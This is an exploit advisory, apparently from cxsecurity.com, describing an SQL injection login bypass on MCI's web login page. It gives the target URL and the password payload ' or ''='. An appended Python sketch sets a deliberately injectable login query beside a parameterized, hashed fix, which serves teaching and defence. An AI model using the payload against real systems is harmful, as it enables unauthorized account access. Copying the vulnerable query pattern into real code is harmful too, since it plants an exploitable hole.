MCI Manager Login Authentication bypass vulnerability

Published : 2015.11.06
Credit : 4TT4CK3R
Risk : Medium
CWE : CWE-89
CVE : N/A
Local : No
Remote : Yes

Description : Mobile Telecommunication Company of Iran (MCI) - Public Company, also known under its brand name
Hamrah-e-Aval, is Iran's first and largest mobile phone network operator. MCI is a subsidiary of the Telecommunication
Company of Iran and it has over 18 million postpaid and over 20 million postpaid and over 20 million prepaid subscribers.


[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
~# : Exploit title : MCI Manager Login Authentication bypass vulnerability
~# : Exploit Author : 4TT4CK3R
~# : Vendor Homepage : https://mciX.ir
~# : Date : 2015/09/03
~# : Tested on : Kali linux , Windows , Mozilla Firefox
~# : Google Dork : No
~# : Location : https://mci.ir/web/guest/login
~# : Instead of the password, use ' or ''='


~# : Username : Colleague Username
~# : Password : ' or ''='

~# : ScreenShot : http://i.imgur.com/ffRZCLE.png

~# : Discovered by : 4TT4CK3R

~# : Special thanks to : Iranian BlackHat Hackers

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
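
The advisory does not show the server-side query. As an added example (not the advisory author's or the vendor's code), the sketch below assumes a login query built by string concatenation, shows why the quoted password value turns the WHERE clause into a tautology, and sets it beside a parameterized lookup with a hashed-password check that rejects the same input. The table, column and function names and the sample account are constructed for illustration.

```python
import hashlib
import hmac
import os
import sqlite3

PAYLOAD = "' or ''='"  # password value quoted in the advisory


def pw_hash(password, salt):
    # Salted PBKDF2 hash, as the hardened login would store it.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db():
    # Constructed account. The plaintext column exists only to model the weak design.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users "
               "(username TEXT PRIMARY KEY, password TEXT, salt BLOB, hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO users VALUES (?, ?, ?, ?)",
               ("colleague", "S3cret!pw", salt, pw_hash("S3cret!pw", salt)))
    return db


def login_concatenated(db, username, password):
    # Assumed vulnerable pattern (CWE-89): user input pasted into the SQL text.
    # With PAYLOAD the clause ends in ... AND password = '' or ''='' which,
    # because AND binds tighter than OR, is true for every row.
    sql = ("SELECT 1 FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, username, password):
    # Input is bound as data, and the secret is verified in application code.
    row = db.execute("SELECT salt, hash FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(pw_hash(password, row[0]), row[1])


if __name__ == "__main__":
    db = make_db()
    for fn in (login_concatenated, login_parameterized):
        print(fn.__name__,
              "correct password:", fn(db, "colleague", "S3cret!pw"),
              "advisory value:", fn(db, "colleague", PAYLOAD))
```
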

References:

http://i.imgur.com/ffRZCLE.png



Copyright 2017, cxsecurity.com